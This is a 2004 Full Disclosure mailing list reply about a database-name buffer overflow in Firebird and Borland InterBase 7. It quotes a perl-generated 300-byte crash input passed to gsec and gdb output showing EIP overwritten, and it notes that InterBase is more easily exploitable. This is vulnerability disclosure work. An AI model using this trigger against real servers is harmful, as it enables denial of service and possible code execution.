Full Disclosure mailing list archives
Re: Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow
From: Noam Rathaus <noamr () beyondsecurity com>
Date: Thu, 3 Jun 2004 13:36:33 +0300
On Thursday 03 June 2004 05:03, KF (lists) wrote:
Someone that has had some success communicating things security wise to Borland may wish to contact them about this. [root@CloneRiot bin]# rpm -ivh /root/InterBaseSS_LI-V7.1.0-1.i386.rpm [kf@CloneRiot bin]$ pwd /opt/interbase/bin [kf@CloneRiot bin]$ ./gsec -database 127.0.0.1:`perl -e'print ("A"x300)'` (gdb) c Continuing. [New Thread 1085279152 (LWP 21355)] [New Thread 1095769008 (LWP 21356)] [New Thread 1106258864 (LWP 21357)] Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 1085279152 (LWP 21355)] 0x41414141 in ?? () (gdb) bt #0 0x41414141 in ?? () #1 0x41414141 in ?? () #2 0x41414141 in ?? () ... #35 0x41414141 in ?? () #36 0x41414141 in ?? () (gdb) (gdb) i r eax 0x0 0 ecx 0x82025e4 136324580 edx 0x0 0 ebx 0x81fe29c 136307356 esp 0x40aff5f8 0x40aff5f8 ebp 0x41414141 0x41414141 esi 0x12c 300 edi 0x40affab8 1085274808 eip 0x41414141 0x41414141 eflags 0x10246 66118 (gdb) x/1s $esp 0x40aff5f8: 'A' <repeats 144 times> [root@CloneRiot interbase]# ./bin/ibserver Segmentation fault -KF Noam Rathaus wrote:On Sunday 02 June 2002 01:52, KF (lists) wrote:So is this firebird specific or does it also impact Borland Interbase users? -KFWe haven't tested Borland's Interbase as we didn't have any installation available for testing. However I can assume that since this vulnerability appears in version 1.0.2, which is of very close resemblance to Borland's Interbase sources, that the vulnerability may also affect it.
Hi, Well it appears that the Borland version is a bit more vulnerable, or in other words more exploitable, as in the Firebird I was unable to directly modify EIP, while it appears that the Borland version's EIP is easily modifyable. Thank you for the assistance in verifying whether Borland's Interbase is also vulnerable. -- Thanks Noam Rathaus CTO Beyond Security Ltd. Join the SecuriTeam community on Orkut: http://www.orkut.com/Community.aspx?cmm=44441 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Firebird Database Remote Database Name Overflow Aviram Jenik (Jun 01)
- Re: Firebird Database Remote Database Name Overflow KF (lists) (Jun 01)
- Re: Firebird Database Remote Database Name Overflow Noam Rathaus (Jun 02)
- Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow KF (lists) (Jun 02)
- Re: Firebird [ AND Interbase 7 ] Database Remote Database Name Overflow Noam Rathaus (Jun 03)
- Re: Firebird Database Remote Database Name Overflow Noam Rathaus (Jun 02)
- Re: Firebird Database Remote Database Name Overflow KF (lists) (Jun 01)